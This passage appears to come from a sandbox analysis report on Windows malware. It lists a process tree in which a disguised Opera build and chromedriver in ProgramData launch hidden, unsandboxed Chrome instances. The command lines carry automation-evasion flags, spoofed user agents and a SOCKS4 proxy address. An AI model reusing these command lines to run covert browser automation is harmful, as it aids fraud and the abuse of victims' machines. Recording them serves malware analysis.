                                                                                                                                                                                                                                                                                                                              "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=gpu-process --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --start-stack-profiler --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2820 /prefetch:2
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:180
                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                                                "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=1392 /prefetch:8
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:6244
                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                                                                  "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --lang=ru --service-sandbox-type=utility --enable-quic --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --mojo-platform-channel-handle=2400 /prefetch:8
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:6208
                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\chromedriver.exe
                                                                                                                                                                                                                                                                                                                                "C:\ProgramData\chromedriver.exe" --port=62891
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:4212
                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-backgrounding-occluded-windows --disable-blink-features=AutomationControlled --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-gpu --disable-hang-monitor --disable-infobars --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-blink-features=ShadowDOMV0 --enable-logging --log-level=0 --mute-audio --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --window-position=2000,2000
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:1000
                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\ProgramData\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\ProgramData\User Data\Crashpad" "--metrics-dir=C:\ProgramData\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff9fac84f50,0x7ff9fac84f60,0x7ff9fac84f70
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:2508
                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=2116 /prefetch:8
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:4852
                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=1676 /prefetch:8
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:2580
                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --no-sandbox --enable-logging --log-level=0 --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --enable-logging --log-level=0 --mojo-platform-channel-handle=1620 /prefetch:2
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:5584
                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2368 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1892
                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2328 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5296
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1644 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4044
                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5080
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3680
                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=2864 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4572
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=4016 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3092
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2676 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                PID:3796
                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=4220 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5516
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=4444 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=4696 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4980
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=audio --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=4496 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5672
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,6742392927740235398,8960490597387521378,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" --user-data-dir="C:/ProgramData/User Data" --enable-logging --log-level=0 --mojo-platform-channel-handle=4688 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4316
                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\chromedriver.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\ProgramData\chromedriver.exe" --port=62891
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1360
                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\chromedriver.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\chromedriver.exe" --port=62035
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:2892
                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-backgrounding-occluded-windows --disable-blink-features=AutomationControlled --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-gpu --disable-hang-monitor --disable-infobars --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-blink-features=ShadowDOMV0 --enable-logging --log-level=0 --mute-audio --no-first-run --no-sandbox --no-service-autorun --password-store=basic --proxy-server=socks4://192.162.246.222:51496 --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --window-position=2000,2000
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3116
                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\ProgramData\User Data81" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\ProgramData\User Data81\Crashpad" "--metrics-dir=C:\ProgramData\User Data81" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff9fac84f50,0x7ff9fac84f60,0x7ff9fac84f70
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=1652 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4492
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --no-sandbox --enable-logging --log-level=0 --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --enable-logging --log-level=0 --mojo-platform-channel-handle=1524 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:6060
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2248 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2320
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2220 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5732
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=2092 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4716
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2244
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=3680 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:5280
